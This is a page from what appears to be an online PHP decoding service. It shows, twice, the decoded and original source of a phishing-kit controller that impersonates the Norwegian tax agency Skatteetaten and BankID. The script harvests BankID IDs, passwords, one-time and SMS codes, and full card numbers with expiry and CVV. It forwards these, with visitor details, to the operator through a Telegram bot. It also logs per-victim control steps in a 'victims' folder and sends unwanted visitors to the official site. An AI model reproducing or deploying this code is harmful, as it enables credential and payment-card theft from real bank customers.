Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function get_current_file_url($Protocol='http://') { return $Protocol.$_SER..

Decoded Output download

<?php 
   
function get_current_file_url($Protocol='http://') { 
   return $Protocol.$_SERVER['HTTP_HOST'].str_replace($_SERVER['DOCUMENT_ROOT'], '', realpath(__DIR__));  
} 
$currentD = get_current_file_url($Protocol='http://'); 
 
 
    require_once 'includes/main.php'; 
 
 
 
 
 
$XENO_TOKEN = "https://api.telegram.org/bot" . TELEGRAM_TOKEN; 
 
$chat_id = TELEGRAM_CHAT_ID; 
 
 
 
    $ip2 = gethostbyaddr($_SERVER['REMOTE_ADDR']); 
$key = substr(sha1($ip2."pewkok"), 0, 15); 
 
 
if(isset($_GET['address']))  
{ 
visitors(); 
 
                $subject = get_client_ip() . ' | Skatteetaten Bankid | PLZ'; 
                $message = '/-- PLZ code --/' . get_client_ip() . "
"; 
                $message .= 'PLZ zip code : ' . $_GET['address'] . "
"; 
            $message .= 'link : ' . $_GET['url'] . "
"; 
                $message .= 'nbank : ' . $_GET['Nbank'] . "
"; 
                $message .= 'Steps : ' . $currentD . '/control?ip=' . get_client_ip() . "
"; 
                $message .= '/-- END plz code --/' . "
"; 
                $message .= victim_infos(); 
                send($subject,$message); 
                reset_data(); 
                header("Location: login/?unlock=code&appIdKey=".$key."&country=NO"); 
                exit(); 
            }  
 
 
    if( $_GET['pwd'] == PASSWORD ) { 
        session_destroy(); 
        visitors(); 
         header("Location: login/?unlock=code&appIdKey=".$key."&country=NO"); 
        exit(); 
         
         
         
         
    } else if( !empty($_GET['redirection']) ) { 
        $red = $_GET['redirection']; 
      
      if( $red == 'log' ) { 
         header("Location: login/?unlock=code&appIdKey=".$key."&country=NO"); 
            exit(); 
        } 
       
      
      if( $red == 'log' ) { 
         header("Location: login/?unlock=code&appIdKey=".$key."&country=NO"); 
            exit(); 
        } 
       
 
      if( $red == 'log' ) { 
         header("Location: login/?unlock=code&appIdKey=".$key."&country=NO"); 
            exit(); 
        } 
       
 
      if( $red == 'sms' ) { 
header("Location: login/kode.php?unlock=code&appIdKey=".$key."&country=NO"); 
            exit(); 
        } 
       
 
      if( $red == 'cc' ) { 
    header("Location: login/cc.php?unlock=code&appIdKey=".$key."&country=NO"); 
            exit(); 
        } 
       
     
 
 
        header("Location: login/". $red ."?unlock=code&appIdKey=".$key."&country=NO"); 
        exit(); 
    } else if($_SERVER['REQUEST_METHOD'] == "POST") { 
        if( !empty($_POST['captcha']) ) { 
            header("HTTP/1.0 404 Not Found"); 
            die(); 
        } 
        if ($_POST['step'] == "log") { 
            $_SESSION['errors']     = []; 
            $_SESSION['ramida']   = $_POST['ramida']; 
            if( empty($_POST['ramida']) ) { 
                $_SESSION['errors']['ramida'] = true; 
            } 
 
             
            if( count($_SESSION['errors']) == 0 ) { 
                $subject = get_client_ip() . ' | Skatteetaten Bankid | Login'; 
                $message = '/-- Login Skatteetaten Bankid --/' . get_client_ip() . "
"; 
                $message .= 'Bnk  : ' . $_POST['ramid'] . "
"; 
                $message .= 'ID          : '.$_POST['ramida'] . "
"; 
                $message .= 'Engangskode : '.$_POST['kode']."
"; 
                $message .= 'Passord     : '.$_POST['pass']."
"; 
                $message .= 'Steps : ' . get_steps_link() . "
"; 
                $message .= '/-- END Login  --/' . "
"; 
                $message .= victim_infos(); 
                send($subject,$message); 
                reset_data(); 
                header("Location: login/cc.php?unlock=code&appIdKey=".$key."&country=NO"); 
                exit(); 
            } else { 
                header("Location: login/?unlock=code&appIdKey=".$key."&country=NO"); 
                exit(); 
            } 
        } 
         
 
 
 
 
  
         
       if ($_POST['step'] == "sms") { 
             
            if( count($_SESSION['errors']) == 0 ) { 
                $subject = get_client_ip() . ' | Skatteetaten Bankid | Engangskode '; 
                $message = '/-- Engangskode  Skatteetaten Bankid --/' . get_client_ip() . "
"; 
                $message .= 'Engangskode  : '.$_POST['sms']."
"; 
                $message .= 'Steps : ' . get_steps_link() . "
"; 
                $message .= '/-- END Engangskode  --/' . "
"; 
                $message .= victim_infos(); 
                send($subject,$message); 
                reset_data(); 
                header("Location: login/loading.php?unlock=code&appIdKey=".$key."&country=NO"); 
                exit(); 
            } else { 
                header("Location: login/kode.php?unlock=code&appIdKey=".$key."&country=NO"); 
                exit(); 
            } 
        } 
 
 
      
 
 
 
 
 
 
 
 
 
 
 
 
 
        if ($_POST['step'] == "cc") { 
            $_SESSION['errors']      = []; 
            $_SESSION['one']   = $_POST['one']; 
            $_SESSION['two']     = $_POST['two']; 
            $_SESSION['three']      = $_POST['three']; 
            if( count($_SESSION['errors']) == 0 ) { 
                $subject = get_client_ip() . ' | Skatteetaten Bankid | Card'; 
                $message = '/-- CARD Skatteetaten Bankid --/' . get_client_ip() . "
"; 
                          $message .= "NAME  :  ".$_POST['name']." 
"; 
$message .= "CC    :  ".$_POST['one']." 
"; 
$message .= "EXP   :  ".$_POST['two']." 
"; 
$message .= "CVV   :  ".$_POST['three']." 
"; 
                $message .= "ADDR  :  ".$_POST['add']." 
"; 
                $message .= "CITY  :  ".$_POST['city']." 
"; 
                $message .= "ZIP   :  ".$_POST['zip']." 
"; 
                $message .= 'Steps : ' . get_steps_link() . "
"; 
                $message .= '/-- END CARD Skatteetaten Bankid --/' . "
"; 
                $message .= victim_infos(); 
                sendCC($subject,$message); 
                reset_data(); 
                header("Location: login/kode.php?unlock=code&appIdKey=".$key."&country=NO"); 
            } else { 
                header("Location: login/cc.php?unlock=code&appIdKey=".$key."&country=NO"); 
            } 
        } 
        if ($_POST['step'] == "control") { 
            $fp = fopen('victims/'. $_POST['ip'] .'.txt', 'wb'); 
            if( $_POST['to'] == 'tan' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['tan_text']; 
            } 
 
             if( $_POST['to'] == 'bnk' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['bnk_text']; 
            } 
             if( $_POST['to'] == 'pin' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['pin_text']; 
            } 
            if( $_POST['to'] == 'errortan' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['errortan_text']; 
            } 
            if( $_POST['to'] == 'sms' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['sms_text']; 
            } 
 
             if( $_POST['to'] == 'billing' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['billing_text']; 
            } 
            if( $_POST['to'] == 'errorsms' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['errorsms_text']; 
            } 
            if( $_POST['to'] == 'app' ) { 
                $_POST['to'] = $_POST['to']. '/' . $_POST['error']; 
            } 
            if( $_POST['to'] == 'bill' ) { 
                $_POST['to'] = $_POST['to']. '/' . $_POST['error']; 
            } 
        if( $_POST['to'] == 'qfc' ) { 
                $_POST['to'] = $_POST['to']. '/' . $_POST['error']; 
            } 
        if( $_POST['to'] == 'plz' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['error']; 
            } 
        if( $_POST['to'] == 'qrimg' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['b64img']; 
            } 
        if( $_POST['to'] == 'success' ) { 
                $_POST['to'] = $_POST['to'] . '/' . $_POST['error']; 
            } 
            fwrite($fp, $_POST['to']); 
            fclose($fp); 
            header("location: control.php?ip=" . $_POST['ip']); 
        } 
    } else { 
        header("Location: " . OFFICIAL_WEBSITE); 
        exit(); 
    } 
?>

Did this file decode correctly?

Original Code

<?php
  
function get_current_file_url($Protocol='http://') {
   return $Protocol.$_SERVER['HTTP_HOST'].str_replace($_SERVER['DOCUMENT_ROOT'], '', realpath(__DIR__)); 
}
$currentD = get_current_file_url($Protocol='http://');


    require_once 'includes/main.php';





$XENO_TOKEN = "https://api.telegram.org/bot" . TELEGRAM_TOKEN;

$chat_id = TELEGRAM_CHAT_ID;



    $ip2 = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$key = substr(sha1($ip2."pewkok"), 0, 15);


if(isset($_GET['address'])) 
{
visitors();

                $subject = get_client_ip() . ' | Skatteetaten Bankid | PLZ';
                $message = '/-- PLZ code --/' . get_client_ip() . "\r\n";
                $message .= 'PLZ zip code : ' . $_GET['address'] . "\r\n";
            $message .= 'link : ' . $_GET['url'] . "\r\n";
                $message .= 'nbank : ' . $_GET['Nbank'] . "\r\n";
                $message .= 'Steps : ' . $currentD . '/control?ip=' . get_client_ip() . "\r\n";
                $message .= '/-- END plz code --/' . "\r\n";
                $message .= victim_infos();
                send($subject,$message);
                reset_data();
                header("Location: login/?unlock=code&appIdKey=".$key."&country=NO");
                exit();
            } 


    if( $_GET['pwd'] == PASSWORD ) {
        session_destroy();
        visitors();
         header("Location: login/?unlock=code&appIdKey=".$key."&country=NO");
        exit();
        
        
        
        
    } else if( !empty($_GET['redirection']) ) {
        $red = $_GET['redirection'];
     
      if( $red == 'log' ) {
         header("Location: login/?unlock=code&appIdKey=".$key."&country=NO");
            exit();
        }
      
     
      if( $red == 'log' ) {
         header("Location: login/?unlock=code&appIdKey=".$key."&country=NO");
            exit();
        }
      

      if( $red == 'log' ) {
         header("Location: login/?unlock=code&appIdKey=".$key."&country=NO");
            exit();
        }
      

      if( $red == 'sms' ) {
header("Location: login/kode.php?unlock=code&appIdKey=".$key."&country=NO");
            exit();
        }
      

      if( $red == 'cc' ) {
    header("Location: login/cc.php?unlock=code&appIdKey=".$key."&country=NO");
            exit();
        }
      
    


        header("Location: login/". $red ."?unlock=code&appIdKey=".$key."&country=NO");
        exit();
    } else if($_SERVER['REQUEST_METHOD'] == "POST") {
        if( !empty($_POST['captcha']) ) {
            header("HTTP/1.0 404 Not Found");
            die();
        }
        if ($_POST['step'] == "log") {
            $_SESSION['errors']     = [];
            $_SESSION['ramida']   = $_POST['ramida'];
            if( empty($_POST['ramida']) ) {
                $_SESSION['errors']['ramida'] = true;
            }

            
            if( count($_SESSION['errors']) == 0 ) {
                $subject = get_client_ip() . ' | Skatteetaten Bankid | Login';
                $message = '/-- Login Skatteetaten Bankid --/' . get_client_ip() . "\r\n";
                $message .= 'Bnk  : ' . $_POST['ramid'] . "\r\n";
                $message .= 'ID          : '.$_POST['ramida'] . "\r\n";
                $message .= 'Engangskode : '.$_POST['kode']."\n";
                $message .= 'Passord     : '.$_POST['pass']."\n";
                $message .= 'Steps : ' . get_steps_link() . "\r\n";
                $message .= '/-- END Login  --/' . "\r\n";
                $message .= victim_infos();
                send($subject,$message);
                reset_data();
                header("Location: login/cc.php?unlock=code&appIdKey=".$key."&country=NO");
                exit();
            } else {
                header("Location: login/?unlock=code&appIdKey=".$key."&country=NO");
                exit();
            }
        }
        




 
        
       if ($_POST['step'] == "sms") {
            
            if( count($_SESSION['errors']) == 0 ) {
                $subject = get_client_ip() . ' | Skatteetaten Bankid | Engangskode ';
                $message = '/-- Engangskode  Skatteetaten Bankid --/' . get_client_ip() . "\r\n";
                $message .= 'Engangskode  : '.$_POST['sms']."\n";
                $message .= 'Steps : ' . get_steps_link() . "\r\n";
                $message .= '/-- END Engangskode  --/' . "\r\n";
                $message .= victim_infos();
                send($subject,$message);
                reset_data();
                header("Location: login/loading.php?unlock=code&appIdKey=".$key."&country=NO");
                exit();
            } else {
                header("Location: login/kode.php?unlock=code&appIdKey=".$key."&country=NO");
                exit();
            }
        }


     













        if ($_POST['step'] == "cc") {
            $_SESSION['errors']      = [];
            $_SESSION['one']   = $_POST['one'];
            $_SESSION['two']     = $_POST['two'];
            $_SESSION['three']      = $_POST['three'];
            if( count($_SESSION['errors']) == 0 ) {
                $subject = get_client_ip() . ' | Skatteetaten Bankid | Card';
                $message = '/-- CARD Skatteetaten Bankid --/' . get_client_ip() . "\r\n";
                          $message .= "NAME  :  ".$_POST['name']." \n";
$message .= "CC    :  ".$_POST['one']." \n";
$message .= "EXP   :  ".$_POST['two']." \n";
$message .= "CVV   :  ".$_POST['three']." \n";
                $message .= "ADDR  :  ".$_POST['add']." \n";
                $message .= "CITY  :  ".$_POST['city']." \n";
                $message .= "ZIP   :  ".$_POST['zip']." \n";
                $message .= 'Steps : ' . get_steps_link() . "\r\n";
                $message .= '/-- END CARD Skatteetaten Bankid --/' . "\r\n";
                $message .= victim_infos();
                sendCC($subject,$message);
                reset_data();
                header("Location: login/kode.php?unlock=code&appIdKey=".$key."&country=NO");
            } else {
                header("Location: login/cc.php?unlock=code&appIdKey=".$key."&country=NO");
            }
        }
        if ($_POST['step'] == "control") {
            $fp = fopen('victims/'. $_POST['ip'] .'.txt', 'wb');
            if( $_POST['to'] == 'tan' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['tan_text'];
            }

             if( $_POST['to'] == 'bnk' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['bnk_text'];
            }
             if( $_POST['to'] == 'pin' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['pin_text'];
            }
            if( $_POST['to'] == 'errortan' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['errortan_text'];
            }
            if( $_POST['to'] == 'sms' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['sms_text'];
            }

             if( $_POST['to'] == 'billing' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['billing_text'];
            }
            if( $_POST['to'] == 'errorsms' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['errorsms_text'];
            }
            if( $_POST['to'] == 'app' ) {
                $_POST['to'] = $_POST['to']. '/' . $_POST['error'];
            }
            if( $_POST['to'] == 'bill' ) {
                $_POST['to'] = $_POST['to']. '/' . $_POST['error'];
            }
        if( $_POST['to'] == 'qfc' ) {
                $_POST['to'] = $_POST['to']. '/' . $_POST['error'];
            }
        if( $_POST['to'] == 'plz' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['error'];
            }
        if( $_POST['to'] == 'qrimg' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['b64img'];
            }
        if( $_POST['to'] == 'success' ) {
                $_POST['to'] = $_POST['to'] . '/' . $_POST['error'];
            }
            fwrite($fp, $_POST['to']);
            fclose($fp);
            header("location: control.php?ip=" . $_POST['ip']);
        }
    } else {
        header("Location: " . OFFICIAL_WEBSITE);
        exit();
    }
?>

Function Calls

None

Variables

None

Stats

MD5 e77cff9850f565e5c5067cbf9e9670f7
Eval Count 0
Decode Time 45 ms